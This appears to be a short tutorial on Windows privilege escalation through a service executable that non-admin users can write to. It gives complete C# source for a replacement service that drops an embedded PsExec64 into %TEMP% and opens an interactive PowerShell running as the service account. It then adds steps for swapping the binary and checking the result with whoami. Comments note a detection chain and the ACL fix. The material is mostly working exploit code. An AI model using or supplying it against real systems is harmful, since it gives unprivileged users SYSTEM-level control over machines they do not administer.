If the executable of a Windows service is writable by non-admin users, it can be replaced with another executable that launches a command prompt under the system account.
FakeService.cs
/// <summary>
/// Stand-in service binary illustrating the writable-service-executable weakness
/// described above: when the Service Control Manager starts it, it runs PsExec to
/// open an interactive PowerShell window and then stops itself. The window runs as
/// whatever account the service is configured with (the intro assumes the system
/// account), so the effective fix is the ACL on the service's executable.
/// </summary>
public class FakeService : ServiceBase
{
    /// <summary>
    /// Service start callback: drop PsExec into the temp directory, launch
    /// PowerShell through it in session 1, then request a stop of this service.
    /// </summary>
    /// <param name="args">Start arguments passed by the SCM; not used.</param>
    protected override void OnStart(string[] args)
    {
        // Presumably gives the SCM start handshake time to finish before children
        // are spawned -- TODO confirm; the 10 s value is not explained here.
        Thread.Sleep(10000);
        var psExecPath = ExtractPsExec();
        // Hard-coded path; fails on installations where System32 lives elsewhere.
        var powershellPath = @"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe";
        // PsExec flags: -accepteula suppresses the EULA dialog, -d does not wait
        // for the child, -i 1 runs it interactively in session 1 (typically the
        // console user's session).
        // Detection note: a service process writing PsExec64.exe into %TEMP% and
        // then spawning powershell.exe through it is the observable chain here.
        Process.Start(psExecPath, $"-accepteula -d -i 1 {powershellPath}");
        Thread.Sleep(1000);
        // Stop() is issued from a separate thread rather than inline in OnStart --
        // presumably to avoid stopping the service from inside its own start
        // callback; confirm against ServiceBase semantics.
        new Thread(() => this.Stop()).Start();
    }

    /// <summary>
    /// Writes the PsExec64 binary held in the project resource
    /// <c>Resources.PsExec64</c> (not shown here) to the temp directory unless a
    /// file with that name already exists, and returns its path.
    /// </summary>
    /// <returns>Full path of <c>PsExec64.exe</c> in the temp directory.</returns>
    private string ExtractPsExec()
    {
        var psExecPath = Path.Combine(Path.GetTempPath(), "PsExec64.exe");
        // NOTE(review): an existing file at this path is reused without checking
        // its contents, so whatever already sits there is what gets executed.
        if (!File.Exists(psExecPath))
            File.WriteAllBytes(psExecPath, Resources.PsExec64);
        return psExecPath;
    }
}
Program.cs
/// <summary>
/// Process entry point: hands the single <see cref="FakeService"/> instance to
/// the Service Control Manager, which drives its OnStart/OnStop callbacks.
/// </summary>
class Program
{
    /// <param name="args">Command-line arguments; unused (start arguments reach OnStart via the SCM).</param>
    static void Main(string[] args)
    {
        // Single-service overload of Run; equivalent to passing a one-element array.
        ServiceBase.Run(new FakeService());
    }
}
- Replace the Windows service's executable with the compiled application.
- When the Windows service starts, the new executable opens a PowerShell prompt (via PsExec) in the interactive session.
# Run inside the prompt the service opened; prints the account that prompt runs as
# (the intro expects the service account, i.e. the system account).
whoami